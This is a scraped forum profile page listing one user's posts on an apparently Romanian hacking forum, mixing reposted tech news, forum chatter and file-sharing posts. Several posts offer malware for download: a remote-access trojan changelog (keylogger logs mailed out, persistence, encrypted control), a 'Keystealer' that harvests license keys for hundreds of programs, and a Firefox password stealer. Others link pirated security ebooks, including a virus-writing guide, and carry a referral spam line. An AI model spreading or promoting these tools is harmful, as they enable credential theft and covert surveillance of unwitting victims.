-
Posts
18725 -
Joined
-
Last visited
-
Days Won
706
Everything posted by Nytro
-
Takedown sau Anti-Trust, care e cu programatori? Ca am inteles ca e reusit...
-
Windows XP costa numai 15 dolari de Catalin Calciu | 20 aprilie 2009 Dar totusi sa nu ne bucuram prea tare, pentru ca acest pret este valabil doar pentru producatorii de netbookuri, si aceasta suma este perceputa pentru fiecare netbook ce va veni preinstalat cu Windows XP. Microsoft percep aceasta suma foarte mica pentru ca incearca din rasputeri sa elimine orice alt sistem de operare de pe aceasta piata de calculatoare ultra-portabile. Pretul de 15 dolari este valabil pentru Windows XP Home Edition, si pentru un Windows Vista pretul este situate intre 50 si 60 de dolari. De altfel, se pare ca aceste preturi foarte mici sunt si motivul pentru care Microsoft au publicat rezultate financiare in scadere pe anul trecut, pentru ca in mod normal sistemele de operare comercializate de Microsoft au preturi de vanzare mult mai mari.
-
Microsoft anunta Office 2010 de Catalin Calciu | 16 aprilie 2009 Compania din Redmond a anuntat ultima versiune de Office, succesoarea lui Office 2007 ce va purta denumirea de Office 2010. Cei de la Microsoft au trebuit sa aiba in vedere si concurenta venita in ultima periada din partea multor companii, intre care Mozilla, Google, sau Sun ( prin Open Office). Din aceasta suita primul venit va fi Exchange 2010 ce va aparea in a doua jumatate a anului current, si restul de aplicatii: aplicatii pentru Web, SharePoint 2010, Visio 2010 si Project 2010 vor aparea sub forma unui preview tehnic la in al treilea trimestru al acestui an. Interesant este ca ultima versiune de Office va disponibila si sub forma de aplicatie Web, si va merge si pe telefoane mobile si chiar si pe iPhone.
-
Hacker-ul care a atacat Twitter a fost angajat de Alex Hanea | 20 aprilie 2009 Atacul care a avut loc saptamana trecuta asupra celebrului site Twitter nu mai este o noutate pentru cunoscatori. Un pusti de numai 17 ani a creat un worm care a afectat Twitter atat tehnic cat mai ales la nivel de prestigiu. Adolescentul, pe numele lui Michael Mooney, este din New York si, conform afirmatiilor sale, a creat viermele din... plictiseala. Mai mult, nici macar nu a vrut sa faca vreun rau si sa aduca vreun prejudiciu site-ului. DOar ca, deoarece cei de a Twitter nu au vrut sa ii raspunda la incercarile de a-i contacta, a ales sa creeze viermele pentru a le arata care sunt vulnerabilitatile si a le oferi sansa sa le corecteze. In mod cert, insa, actiunea sa a atras atentia celor de la ExqSoft care i-au propus sa semneze un contract pentru pozitia de analist pe probleme de securitate. Travis Rowland, fondator al companiei mentionate mai sus, a sustinut ca tanarul are abilitatile necesare pentru o cariera in domeniu. In plus, atata timp cat atacul nu s-a soldat cu extragerea unor informati care sa ii afecteze financiar pe utilizatorii Twitter, el considera ca exista sanse ca adolescentul sa transforme pasiunea sa in activitate legala si platita. Atitudinea celor de la ExqSoft nu a fost incurajata si apreciata de catre alti specialisti, acestia considerand ca astfel de atitudini nu pot decat sa incurajeze hacker-ii in activitatile lor. Din istoricul existent, crearea virusilor si a viermilor si activarea lor pe Internet au sanse mai mari sa duca la amenda si chiar puscarie mai degraba decat un contract de munca pe o suma frumoasa de bani. Dincolo despre dezbaterea daca este etic sa fie angajat un hacker sau nu, din intreaga intamplare Twitter ramane cu o imagine sifonata. Celebrul site care, mai nou, si-a legat numele si de evenimentele de la Chisinau, a lasat o amprenta atat de puternica incat a fost considerata prima revolutie care s-a desfasurat si pe Internet.
-
12 extensii utile pentru Firefox de Bianca Dinu | 17 aprilie 2009 Firefox a fost si ramane, deocamdata, browserul cel mai utilizat atat pentru viteza si securitate, cat si pentru optiunile de personalizare. Acestea din urma, suplimentele si extensiile Firefox, permit personalizarea experientei fiecarui utilizator pe web. Despre ele, de fapt o foarte mica parte din tot ceea ce ofera browserul Firefox, veti gasi mai multe informatii in cele ce urmeaza. Succes la download! FoxTab (download: http://www.hit.ro/downloads/browsers/foxtab-1-1-2 ) FoxTab este o extensie 3D pentru tab-urile de browsing. Cu cele cinci layout-uri atractive, schimbarea tab-urilor deja deschise este mult mai usor de realizat. Faptul ca totul se intampla intr-un mediu 3D, gruparea, filtrarea si inchiderea sau deschiderea de noi tab-uri se transforma intr-o experienta inedita si atractiva. FoxTax este o extensie care schimba complet viziunea asupra modalitatii de navigare pe Internet. Functioneaza pe Windows XP, Vista, Mac OS X Leopard si Linux. Read It Later (download: http://www.hit.ro/downloads/browsers/read-it-later-0-9941 ) Extensia Read It Later permite salvarea paginilor de interes pentru utilizator, astfel incat acesta le poate parcurge sau citi fie atunci cand va avea neoie, fie atunci cand va avea timp. Extensia elimina dezordinea din ferestrele de navigare si le pastreaza numai pe cele pe care utilizatorul le marcheaza ca fiind de interes pentru el. Extensia se activeaza in momentul in care se selecteaza link-urile de interes si se marcheaza prin click. Weave Sync (download: http://www.hit.ro/downloads/browsers/mozilla-labs--weave-sync-0-3-0-1 ) WeaveSync este o extensie care cripteaza si sincronizeaza in mod securizat setarile Firefox cu celelalte browsere. Pe langa browser, WeaveSync pastreaza toate setarile din Forefox si pentru mai multe calculatoare desktop sau laptop dar si pentru telefoane mobile. Weave salveaza pe serverele Mozilla lista de bookmark-uri, site-urile vizitate, cookie-urile si alte informatii determinate de navigarea cu browserul Mozilla. FindList (download: https://addons.mozilla.org/en-US/firefox/addon/11147 ) Extensia FindList transforma box-ul de cautare in paginile web intr-o lista de tip drop down. FindList pastreaza in aceasta lista pana la 15 elemente salvate din cautarile anterioare ale utilizatorului. Extensia este considerata foarte utila pentru cei care opereaza in mod regulat cautari similare. Cooliris (download: http://www.hit.ro/downloads/browsers/cooliris-1-9-1 ) Full-screen si 3D – extensia Cooliris este un fel de "tab preview" prin care se poate vizualiza orice link, imagine sau clip video dintr-o pagina fara a fi nevoie sa se deschida acea pagina intr-o fila sau fereastra noua. In plus, Cooliris impresioneaza de cele mai multe ori prin modul de afisare a imaginilor sau clipurilor video rezultate din cautari (incercati de exemplu sa folositi Cooliris in Google Images sau YouTube). Personas (download: http://www.hit.ro/downloads/browsers/personas-for-firefox-1-0) Personas for Firefox este o extensie care include zeci de teme si skin-uri pentru browser. Prin intermediul acestora se poate schimba fundalul browserului, fara repornirea programului. Cu Personas, fiecare isi poate personaliza si individualiza browserul cu sute de designuri deja disponibile sau isi poate crea propriul design. Schimbarea temelor se poate realiza cu ajutorul unui buton plasat pe status bar. Video DownloadHelper (download: http://www.hit.ro/downloads/browsers/video-downloadhelper-4-3 ) Video DownloadHelper este cea mai usoara modalitate prin care puteti downloada si converti video-urile de pe Web, mai exact de pe majoritatea site-urilor de tip YouTube. Extensia functioneaza atat pentru galeriile audio cat si pentru cele de imagini. PDF Download (download: http://www.hit.ro/downloads/browsers/pdf-download-2-1-0-2 ) PDF Download se poate folosi pentru vizualizarea fisierelor PDF in Firefox ca si HTML. De asemenea, prin toolbar-ul Web-to-PDF puteti salva si shareui paginile Web la calitatea unui fisier PDF. Browser Backgrounds (download: http://www.hit.ro/downloads/browsers/browser-backgrounds-0-2 ) Pana acum, ideea de background image era corelata numai cu wallpaperele pentru desktop. Cu extensia Browser Backgrouns de la Firefox, acest lucru devine posibil si pentru browser. Folosind extensia, puteti alege dintr-o gama extinsa de imagini pe care le puteti plasa, ulterior in fundalul browserului fara a il inchide sau a opri navigarea. De asememena, utilizatorul isi poate uploada propriile imagini in browser. Nature Photos Boom (download: https://addons.mozilla.org/en-US/firefox/addon/10438 ) In cazul in care nu vrei ca pe intregul browser sa apara fotografia preferata, poti alege sa iti personalizezi numai o parte din fereastra de navigare. Cu Nature Photos Boom aveti la dispozitie opt teme pentru toolbar si sidebar, pe care le puteti schimba fara inchiderea, restartarea sau incetinirea browserului. Pearl Crescent Page Saver Basic (download: http://www.hit.ro/downloads/browsers/pearl-crescent-page-saver-basic-2-1 ) Cu extensia Pearl Crescent Page Saver Basic puteti salva orice imagine incarcata pe o pagina Web (inclusiv continut Flash prin activarea functiei “Arrange to Capture Flash Content”) in propriul computer. Screenshot-urile pot fi capturate interactiv sau din meniul de comenzi. Aveti optiunea de a alege si selecta formatul imaginii (PNG sau JPEG), dimensiunile precum si denumirea acesteia. Gradient iPaques (download: https://addons.mozilla.org/en-US/firefox/addon/11081 ) Ultima, dar nu cea din urma, extensie din aceasta categorie este o tema referitoare la Sarbatorile de Paste. Odata instalata aceasta tema, oua colorate si iepurasi vor aparea de peste tot. Butoanele de back si forward vor fi personalizate in forma de oua rosii. Sursa: Hit.ro
-
Hackers 1995 - Un jeg de film, cred ca are o mare vina pentru interpretarea conceptului de "hacker". Asa am vazut ceva dragut, era si despre Defcon, mai multe, practic nu film, un documentar: "Hackers are peple too", dar nu aveam subtitrare si nu am stat sa traduc tot ce zic aia, deci nu am inteles mare lucru.
-
Florin Salam - Pune pune pune
-
Ce s-ar face ratatii de turci fara exploituri...
-
E extrem de complicat in PHP: http://php.net/hash Mai exact: http://www.php.net/manual/en/function.hash.php Si algoritmii: http://www.php.net/manual/en/function.hash-algos.php Incerc sa pun mai multe, dar cand am timp. Si la mIRC e foarte putin, nu am stat sa fac cum trebuie.
-
E Royal Crypter v3.0 care nu prea mai e bun
-
Nu m-am referit neaparat la coeficientul de inteligenta, dar acesta, de cele mai multe ori depinde strict de varsta. E totusi un criteriu pentru selectie dupa parerea mea, spre exemplu majoritatea celor care voiau CQ nu prea cred ca aveau mai mult de 12 ani.
-
Asa as avea eu o propunere. Cateva intrebari: 1) Cati ani ai? 2) De ce vrei sa iti faci cont aici? 3) Ce e ala un mouse? Si asa mai departe... Iar cineva valideaza conturile. Dar nu cred ca e cazul, eu nu am prea mai vazut obsedati de CQ si de parole de mess sau alte prostii. Edit: Sunt multi leecheri, care nu fac nimic, nu posteaza nimic. Cel mai bine, sa primeasca ban cei care au sub 10 posturi. Pentru ca nu are rost sa fie sterse conturile. Si daca ar mai fi si acea optiune de validare dupa cateva intrebari ar fi perfect...
-
XP va ramane la putere, in defavoarea Windows 7 de Bianca Dinu | 15 aprilie 2009 Windows 7 se vrea a fi marea salvare a gigantului Microsoft, in conditiile in care ultimul sistem de operare lansat pana acum, Windows Vista, nu a fost nici pe departe cel mai mare succes. Totusi, potrivit unui studiu realizat de firma de cercetare Dimensional Research, se pare ca nici mult promovatul Windows 7 nu va fi folosit la scara larga, cel putin pana nu se dovedeste practic pentru nevoile utilizatorilor. Astfel, cele mai multe companii au declarat ca sunt si vor ramane precaute, preferand sa ramana fidele sistemului de operare Windows XP in loc sa riste achizitionarea si folosirea unui produs pe care nu il cunosc. Potrivit studiului, 83% dintre persoanele si companiile chestionate au declarat ca vor astepta cel putin 12 luni pana sa incerce Windows 7. Desi Windows XP trece oficial in suport limitat, la aproape opt ani dupa lansare, utilizatorii (fie ei companii sau individuali) se bazeaza pe el mai mult ca pe orice alta aplicatie. Sondajul a fost realizat in luna martie a acestui an, la el participand peste 1000 de profesionisti din IT si utilizatori ai sistemelor de operare Windows XP si Windows Vista.
-
Cei interesati de subiect: http://hackpedia.info/viewforum.php?f=152
-
Ma bag si eu. Lucrez la challenge-uri...
-
1 - Some new functions -Send keylogger logs by email -Run server in a visible mode -Upload the plugin automatically during a new connection -Ability to update the server and send plugin by URL -Ability to make changes in configurations of installation of the server without the need to update -Encrypted connection (in this first version the crypt function is simple and can be modified in future versions) -Functions of MSN. This function is under test and does not work on some versions of messenger -Option to perform download directory -Ping function -New startup method: Run Explorer (HKLM and HKCU) -Open file with parameters in the file manager 2 - Some corrections made: -The connection with client was modified to avoid the loss from the server after a disconnection. -Correction of boot methods -Correction in filesearch function that caused crash of the server in some cases -Correction in the keylogger, which the user tried to perform the download of logs occurred, in some cases, the crash of the server -Fixed other small bugs that do not affect the execution of the program. Download: http://www.netdrive.ws/165943.html Password: Spy-Net
-
Download: http://www.netdrive.ws/165942.html
-
Splinter Cell Pandora Tomorrow DVD Audio Extractor (Name) Splinter Cell Chaos Theory Call of Duty Call of Duty United Offensive Call of Duty 2 Call of Duty 4 Call of Duty WAW Dawn of War Dawn of War - Dark Crusade Dawn of War - Dark Crusade Dawn of War - Dark Crusade Medieval II Total War Adobe Goolive Nero 7 ACDSystems PicAView Act of War Adobe Photoshop 7 Advanced PDF Password Recovery Advanced PDF Password Recovery Pro Advanced ZIP Password Recovery Anno 1701 Ashamopp WinOptimizer Platinum AV Voice Changer Battlefield(1942) Battlefield 1942 Secret Weapons of WWII Battlefield 1942 The Road to Rome Battlefield 2 Battlefield(2142) Battlefield Vietnam Black and White Black and White 2 Boulder Dash Rocks Burnout Paradise Camtasia Studio 4(Name) Camtasia Studio 4(Key) Chrome Codec Tweak Tool Command and Conquer Generals Command and Conquer Generals Zero Hour Red Alert 2 Red Alert Command and Conquer Tiberian Sun Command and Conquer 3 Command and Conquer 3 Company of Heroes Company of Heroes Counter-Strike Crysis PowerDVD PowerBar CyberLink PowerProducer Day of Defeat The Battle for Middle-earth II The Sims 2 The Sims 2 University The Sims 2 Nightlife The Sims 2 Open For Business The Sims 2 Pets The Sims 2 Seasons The Sims 2 Glamour Life Stuff The Sims 2 Celebration Stuff The Sims 2 H M Fashion Stuff The Sims 2 Family Fun Stuff DVD Audio Extractor (Serial) Empire Earth II F.E.A.R F-Secure FARCRY FIFA 2002 FIFA 2003 FIFA 2004 FIFA 2005 FIFA 07 FIFA 08 Freedom Force Frontlines: Fuel of War Beta Frontlines: Fuel of War GetRight Global Operations Gunman Half-Life Hllgate: London Hidden & Dangerous 2 IGI 2 Retail InCD Serial InCD Username IG2 iPod Converter (Registration Code) iPod Converter (User Name) James Bond 007 Nightfire Status Legends of Might and Magic Macromedia Flash 7 Macromedia Fireworks 7 Macromedia Dreamweaver 7 Madden NFL 07 Matrix Screensave Medal of Honor: Airborne Medal of Honor: Allied Assault Medal of Honor: Allied Assault: Breakthrough Medal of Honor: Allied Assault: Spearhead Medal of Honor: Heroes 2 mIRC Nascar Racing 2002 Nascar Racing 2003 NHL 2002 NBA LIVE 2003 NBA LIVE 2004 NBA LIVE 07 NBA Live 08 Need for Speed Carbon Need For Speed Hot Pursuit 2 Need for Speed Most Wanted Need for Speed ProStreet Need For Speed Underground Need for Speed Underground 2 Nero - Burning Rom Nero 7 Nero 8 NHL 2002 NHL 2004 NHL 2005 NOX Numega SmartCheck OnlineTVPlayer (Name) OnlineTVPlayer (Serial) O&O Defrag 8.0 (Username) O&O Defrag 8.0 (Company) O&O Defrag 8.0 (Serial) Partition Magic 8.0 Passware Encryption Analyzer (Name) Passware Encryption Analyzer (License) Passware Encryption Analyzer (Serial) Passware Windows Key (License) Passware Windows Key (Name) Passware Windows Key (Serial) PowerDvD PowerStrip Pro Evolution Soccer 2008 Rainbow Six III RavenShield Shogun Total War Warlord Edition Sid(Meier) 's Pirates! Sid(Meier) 's Pirates! Sim City 4 Deluxe Sim City 4 Sniffer Pro 4.5 Soldiers Of Anarchy Soldiers Of Anarchy Stalker - Shadow of Chernobyl Star Wars Battlefront II (v1.0) Star Wars Battlefront II (v1.1) Steganos Internet Anonym VPN Splinter Cell Pandora Tomorrow Surpreme Commander S.W.A.T 2 S.W.A.T 3 S.W.A.T 4 TechSmith SnagIt (Name) TechSmith SnagIt (Name) TechSmith SnagIt (Serial) Texas Calculatem 4 (Owner) Texas Calculatem 4 (Owner) The Battle for Middle-earth The Orange Box The Orange Box TMPGEnc DVD Author TuneUp 2007 (Name) TuneUp 2007 (Key) TuneUp 2007 (Company) TuneUp 2008 (Name) TuneUp 2008 (Key) TuneUp 2008 (Company) TuneUp 2009 (Name) TuneUp 2009 (Key) TuneUp 2009 (Company) Winamp (Username) Winamp (Serial) You need "Net Framework 2.0" Anubis scan: http://anubis.iseclab.org/?action=result&task_id=1ea9b04ed829168b4158c4294a783db94&format=html Download: http://rapidshare.com/files/220157251/Keystealer.rar
-
Simple FF 3 Stealer use Nirsoft tools Download: http://www.netdrive.ws/165941.html
-
In this age of viruses and hackers, of electronic eavesdropping and electronic fraud, security is paramount. As the disciplines of cryptography and network security have matured, more practical, readily available applications to enforce network security have developed. This text provides a practical survey of both the principles and practice of cryptography and network security. First, the basic issues to be addressed by a network security capability are explored through a tutorial and survey of cryptography and network security technology. Then, the practice of network security is explored via practical applications that have been implemented and are in use today. Download (11.4Mb): http://rapidshare.com/files/17833529/Cryptography_And_Network_Security.rar Mirror: http://www.filefactory.com/file/4f04a1/ Password: www.ebooksdb.com
-
The Linux operating system continues to gain market share based largely on its reputation as being the most secure operating system available. The challenge faced by system administrators installing Linux is that it is secure only if installed and configured properly, constantly and meticulously updated, and carefully integrated with a wide variety of Open Source security tools. The fact that Linux source code is readily available to every hacker means that system administrators must continually learn security and anti-hacker techniques. Hack Proofing Linux will provide system administrators with all of the techniques necessary to properly configure and maintain Linux systems and counter malicious attacks. * Linux operating systems and Open Source security tools are incredibly powerful, complex, and notoriously under-documented - this book addresses a real need * CD-Rom contains Red Hat/Mandrake Linux RPMs as well as tarballs for other Linux distributions and the BSD community * Uses forensics-based analysis to give the reader an insight to the mind of a hacker. Download (10.3Mb): http://rapidshare.com/files/18715588/Hack_Proofing_Linux_-_A_Guide_To_Open_Source_Security.rar Mirror: http://www.filefactory.com/file/16d8da/ Password: www.ebooksdb.com
-
This little black book discover all knowledge you required to become a virus coder and also to be virus decoder. Ahh...! I think you all already know what is it.. right...? then i just want to tell you that (i mean the definition of computer virus) it is... A computer virus is a computer program that can copy itself and infect a computer without permission or knowledge of the user. A computer virus is a computer program that can copy itself and infect a computer without permission or knowledge of the user. The original may modify the copies or the copies may modify themselves, as occurs in a metamorphic virus. A virus can only spread from one computer to another when its host is taken to the uninfected computer, for instance by a user sending it over a network or carrying it on a removable medium such as a floppy disk, CD, or USB drive. Additionally, viruses can spread to other computers by infecting files on a network file system or a file system that is accessed by another computer. Viruses are sometimes confused with computer worms and Trojan horses. A worm, however, can spread itself to other computers without needing to be transferred as part of a host. A Trojan horse is a form of malware that presents itself as a legitimate program. In contrast to viruses, Trojan horses do not insert their code into other computer files. Many personal computers are now connected to the Internet and to local-area networks, facilitating their spread. Today's viruses may also take advantage of network services such as the World Wide Web, e-mail, and file sharing systems to spread, blurring the line between viruses and worms. Furthermore, some sources use an alternative terminology in which a virus is any form of self-replicating malware. The term comes from the term virus in biology. A computer virus reproduces by making, possibly modified, copies of itself in the computer's memory, storage, or over a network. This is similar to the way a biological virus works. Some viruses are programmed to damage the computer by damaging programs, deleting files, or reformatting the hard disk. Others are not designed to do any damage, but simply replicate themselves and perhaps make their presence known by presenting text, video, or audio, messages. Even these benign viruses can create problems for the computer user. They typically take up computer memory used by legitimate programs. As a result, they often cause erratic behavior and can result in system crashes. In addition, many viruses are bug-ridden, and these bugs may lead to system crashes and data loss. There are many viruses operating in the general Internet today, and new ones are discovered every day. GOTO www.agloco.com for BIG MONEY USING THIS REFFERAL's ID : BBBY6996 ....okey, Download: http://rapidshare.com/files/20500009/The_little_black_book_of_computer_virus.rar Password: www.softarchive.net
-
The Secure Sockets Layer (SSL) and Transport Layer Security(TLS) protocols form the foundation for e-commerce security on the World Wide Web, verifying the authenticity of Web sites, encrypting the transfer of sensitive data, and ensuring the integrity of information exchanged. Now-for the first time the details of these critical security protocols are available in a complete, clear, and concise reference. SSL and TLS Essentials provides complete documentation of the SSL and TLS protocols, including advanced and proprietary extensions never before published. The book thoroughly covers the protocols in operation, including the contents of their messages, message formats, and the cryptographic calculations used to construct them. The text also includes an introduction to cryptography and an explanation of X.509 public key certificates. Stephen Thomas, author of IPng and the TCP/IP Protocols, presents this complex material in a clear and reader-friendly manner. The book includes more than 80 figures and illustrations to supplement its text, and it describes SSL in the context of real-world, practical applications. Download (1Mb): http://rapidshare.com/files/22733925/SSL_and_TLS_Essentials_-_Securing_the_Web.rar Mirror: http://www.filefactory.com/file/0c4f79/ Password: www.ebooksdb.com
-
Did you know that a typical unprotected PC is attacked within 20 minutes of being connected to the Internet? Protect yourself and your family with the CA Internet Security * Recognize the enemy—viruses, worms, Trojan horses, and zombies * Find the lurking applications on your system—spyware and adware * Stop spammers from using your computer to send bulk emails by the millions * Surf sensibly with the right Web browser * Block hackers with the robust CA personal firewall * Update your PC protection regularlyCA Founded in 1976, CA is a global company with 150 offices in more than 45 countries and revenues of $3.5 billion in 2005. With over 15,000 employees, CA provides products and support to 980f Fortune 500® companies, as well as government entities, educational institutions, and thousands of other companies in diverse industries worldwide. CA products cover systems, networks, security, storage, and databases. Download (5.4Mb): http://rapidshare.com/files/22894917/Wiley.Simple.Computer.Security.Disinfect.Your.PC.Jan.2007.eBook-BBL.rar Mirror: http://www.filefactory.com/file/29c942/ Password: www.ebooksdb.com
-
In the fast-moving world of computers, things are always changing. Since the first edition of this strong-selling book appeared two years ago, network security techniques and tools have evolved rapidly to meet new and more sophisticated threats that pop up with alarming regularity. The second edition offers both new and thoroughly updated hacks for Linux, Windows, OpenBSD, and Mac OS X servers that not only enable readers to secure TCP/IP-based services, but helps them implement a good deal of clever host-based security techniques as well. This second edition of Network Security Hacks offers 100 concise and practical hacks, including more information for Windows administrators, hacks for wireless networking (such as setting up a captive portal and securing against rogue hotspots), and techniques to ensure privacy and anonymity, including ways to evade network traffic analysis, encrypt email and files, and protect against phishing attacks. System administrators looking for reliable answers will also find concise examples of applied encryption, intrusion detection, logging, trending and incident response. In fact, this “roll up your sleeves and get busy” security book features updated tips, tricks & techniques across the board to ensure that it provides the most current information for all of the major server software packages. These hacks are quick, clever, and devilishly effective. Download (4Mb): http://rapidshare.com/files/25811510/OReilly.Network.Security.Hacks.2nd.Edition.Oct.2006.rar Mirror: http://www.megaupload.com/?d=J8YD9EET Password: www.ebooksdb.com